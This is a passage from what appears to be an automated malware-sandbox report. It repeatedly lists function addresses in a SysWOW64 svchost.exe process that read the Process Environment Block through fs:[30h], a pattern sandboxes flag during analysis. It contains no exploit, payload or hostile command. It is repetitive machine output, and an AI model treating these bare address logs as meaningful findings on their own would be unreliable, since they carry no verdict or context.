                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov eax, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov ecx, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372823B mov eax, dword ptr fs:[00000030h]2_2_0372823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038062D6 mov eax, dword ptr fs:[00000030h]2_2_038062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h]2_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h]2_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov ecx, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380625D mov eax, dword ptr fs:[00000030h]2_2_0380625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C156 mov eax, dword ptr fs:[00000030h]2_2_0372C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C8158 mov eax, dword ptr fs:[00000030h]2_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov ecx, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760124 mov eax, dword ptr fs:[00000030h]2_2_03760124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov ecx, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038061E5 mov eax, dword ptr fs:[00000030h]2_2_038061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F0115 mov eax, dword ptr fs:[00000030h]2_2_037F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037601F8 mov eax, dword ptr fs:[00000030h]2_2_037601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03770185 mov eax, dword ptr fs:[00000030h]2_2_03770185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C073 mov eax, dword ptr fs:[00000030h]2_2_0375C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732050 mov eax, dword ptr fs:[00000030h]2_2_03732050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6050 mov eax, dword ptr fs:[00000030h]2_2_037B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6030 mov eax, dword ptr fs:[00000030h]2_2_037C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A020 mov eax, dword ptr fs:[00000030h]2_2_0372A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C020 mov eax, dword ptr fs:[00000030h]2_2_0372C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4000 mov ecx, dword ptr fs:[00000030h]2_2_037B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C0F0 mov eax, dword ptr fs:[00000030h]2_2_0372C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037720F0 mov ecx, dword ptr fs:[00000030h]2_2_037720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0372A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037380E9 mov eax, dword ptr fs:[00000030h]2_2_037380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B60E0 mov eax, dword ptr fs:[00000030h]2_2_037B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B20DE mov eax, dword ptr fs:[00000030h]2_2_037B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov eax, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov ecx, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037280A0 mov eax, dword ptr fs:[00000030h]2_2_037280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C80A8 mov eax, dword ptr fs:[00000030h]2_2_037C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373208A mov eax, dword ptr fs:[00000030h]2_2_0373208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738770 mov eax, dword ptr fs:[00000030h]2_2_03738770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730750 mov eax, dword ptr fs:[00000030h]2_2_03730750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE75D mov eax, dword ptr fs:[00000030h]2_2_037BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4755 mov eax, dword ptr fs:[00000030h]2_2_037B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov esi, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov ecx, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AC730 mov eax, dword ptr fs:[00000030h]2_2_037AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730710 mov eax, dword ptr fs:[00000030h]2_2_03730710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760710 mov eax, dword ptr fs:[00000030h]2_2_03760710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C700 mov eax, dword ptr fs:[00000030h]2_2_0376C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE7E1 mov eax, dword ptr fs:[00000030h]2_2_037BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C0 mov eax, dword ptr fs:[00000030h]2_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B07C3 mov eax, dword ptr fs:[00000030h]2_2_037B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037307AF mov eax, dword ptr fs:[00000030h]2_2_037307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E47A0 mov eax, dword ptr fs:[00000030h]2_2_037E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D678E mov eax, dword ptr fs:[00000030h]2_2_037D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03762674 mov eax, dword ptr fs:[00000030h]2_2_03762674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374C640 mov eax, dword ptr fs:[00000030h]2_2_0374C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E627 mov eax, dword ptr fs:[00000030h]2_2_0374E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]2_2_03766620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]2_2_03768620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]2_2_0373262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]2_2_03772619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]2_2_037AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]2_2_037666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]2_2_0376C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]2_2_037C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]2_2_037325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]2_2_037365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]2_2_0376E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]2_2_03764588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
